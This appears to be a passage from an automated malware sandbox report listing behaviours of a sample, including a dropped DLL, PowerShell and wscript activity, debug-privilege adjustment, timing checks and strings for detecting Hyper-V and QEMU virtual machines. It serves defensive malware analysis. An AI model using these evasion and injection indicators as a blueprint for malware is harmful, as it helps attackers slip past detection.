Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll

Jump to dropped file

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 27_2_1F03CE40 rdtsc

27_2_1F03CE40

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 7904

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	API coverage: 1.2 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 2.7 %

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Jump to behavior

Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: ieinstal.exe, 0000001B.00000002.1969313540.000000000336E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1702123686.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1969849452.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1964744060.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1701619808.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832573001.000000000F713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2244636535.000000000F6FD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dllProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dll
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 27_2_1F03CE40 rdtsc

27_2_1F03CE40

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]	27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]	27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h]	27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]	27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]	27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h]	27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094F1D mov eax, dword ptr fs:[00000030h]	27_2_1F094F1D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]	27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]	27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]	27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h]	27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]	27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]	27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]	27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h]	27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3EE2 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3EE2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFBED0 mov eax, dword ptr fs:[00000030h]	27_2_1EFFBED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h]	27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h]	27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h]	27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h]	27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h]	27_2_1EFF2EB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h]	27_2_1EFF2EB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07BF4D mov eax, dword ptr fs:[00000030h]	27_2_1F07BF4D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h]	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07AF50 mov ecx, dword ptr fs:[00000030h]	27_2_1F07AF50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFCEA0 mov eax, dword ptr fs:[00000030h]	27_2_1EFFCEA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07EF66 mov eax, dword ptr fs:[00000030h]	27_2_1F07EF66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F016F70 mov eax, dword ptr fs:[00000030h]	27_2_1F016F70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094F7C mov eax, dword ptr fs:[00000030h]	27_2_1F094F7C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAE89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h]	27_2_1EFEAE89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEBE80 mov eax, dword ptr fs:[00000030h]	27_2_1EFEBE80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC1E70 mov eax, dword ptr fs:[00000030h]	27_2_1EFC1E70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF7E71 mov eax, dword ptr fs:[00000030h]	27_2_1EFF7E71
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]	27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]	27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h]	27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFCE70 mov eax, dword ptr fs:[00000030h]	27_2_1EFFCE70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h]	27_2_1EFBBE60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h]	27_2_1EFBBE60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEEE48 mov eax, dword ptr fs:[00000030h]	27_2_1EFEEE48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBFE40 mov eax, dword ptr fs:[00000030h]	27_2_1EFBFE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]	27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]	27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h]	27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBDE45 mov eax, dword ptr fs:[00000030h]	27_2_1EFBDE45
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBDE45 mov ecx, dword ptr fs:[00000030h]	27_2_1EFBDE45
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFCE3F mov eax, dword ptr fs:[00000030h]	27_2_1EFFCE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h]	27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2E32 mov eax, dword ptr fs:[00000030h]	27_2_1EFC2E32
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07EFD3 mov eax, dword ptr fs:[00000030h]	27_2_1F07EFD3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov ecx, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h]	27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBBE18 mov ecx, dword ptr fs:[00000030h]	27_2_1EFBBE18
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF8E15 mov eax, dword ptr fs:[00000030h]	27_2_1EFF8E15
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094FFF mov eax, dword ptr fs:[00000030h]	27_2_1F094FFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h]	27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC3E01 mov eax, dword ptr fs:[00000030h]	27_2_1EFC3E01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE8FFB mov eax, dword ptr fs:[00000030h]	27_2_1EFE8FFB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F094E03 mov eax, dword ptr fs:[00000030h]	27_2_1F094E03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]	27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]	27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]	27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h]	27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h]	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB9FD0 mov eax, dword ptr fs:[00000030h]	27_2_1EFB9FD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]	27_2_1F088E26
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]	27_2_1F088E26
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]	27_2_1F088E26
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F088E26 mov eax, dword ptr fs:[00000030h]	27_2_1F088E26
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F056E30 mov eax, dword ptr fs:[00000030h]	27_2_1F056E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F056E30 mov eax, dword ptr fs:[00000030h]	27_2_1F056E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov eax, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov ecx, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov eax, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov eax, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov eax, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F055E30 mov eax, dword ptr fs:[00000030h]	27_2_1F055E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBBFC0 mov eax, dword ptr fs:[00000030h]	27_2_1EFBBFC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF8FBC mov eax, dword ptr fs:[00000030h]	27_2_1EFF8FBC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC4FB6 mov eax, dword ptr fs:[00000030h]	27_2_1EFC4FB6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFECFB0 mov eax, dword ptr fs:[00000030h]	27_2_1EFECFB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFECFB0 mov eax, dword ptr fs:[00000030h]	27_2_1EFECFB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03DE50 mov eax, dword ptr fs:[00000030h]	27_2_1F03DE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03DE50 mov eax, dword ptr fs:[00000030h]	27_2_1F03DE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03DE50 mov ecx, dword ptr fs:[00000030h]	27_2_1F03DE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03DE50 mov eax, dword ptr fs:[00000030h]	27_2_1F03DE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03DE50 mov eax, dword ptr fs:[00000030h]	27_2_1F03DE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC1FAA mov eax, dword ptr fs:[00000030h]	27_2_1EFC1FAA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D mov eax, dword ptr fs:[00000030h]	27_2_1F070E6D
